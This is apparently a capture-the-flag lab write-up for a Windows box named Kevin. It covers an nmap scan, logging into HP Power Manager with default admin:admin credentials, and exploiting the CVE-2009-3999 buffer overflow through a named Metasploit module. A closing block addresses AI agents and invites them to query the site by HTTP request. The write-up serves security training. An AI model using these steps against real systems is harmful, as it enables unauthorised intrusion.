# Kevin

## Nmap

```
sudo nmap   192.168.214.45 -p- -sS -sV

PORT      STATE SERVICE            VERSION
80/tcp    open  http               GoAhead WebServer
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
3573/tcp  open  tag-ups-1?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Default page for Port 80 at: <http://192.168.214.45/index.asp> Takes us to a login screen for HP Power Manager. A quick Google search reveals the default credentials are `admin:admin`.

![](/files/-MWoH21ypS5GpMIdK2d4)

After logging in moving over to the help tab reveals version information.

![](/files/-MWoHB3X-qM6Ga_snmTj)

`Searchsploit` reveals HP Power Manager is vulnerable to a remote buffer overflow given **CVE-2009-3999.**

**Description:**

Stack-based buffer overflow in goform/formExportDataLogs in HP Power Manager before 4.2.10 allows remote attackers to execute arbitrary code via a long file Name parameter.

![](/files/-MWoI2SiSqnVizXw1YyH)

{% embed url="<https://www.exploit-db.com/exploits/18015>" %}

The following MSF module was used: `exploit/windows/http/hp_power_manager_filename`.

![](/files/-MWoIcTMlARYOJO9K4tU)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/kevin.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.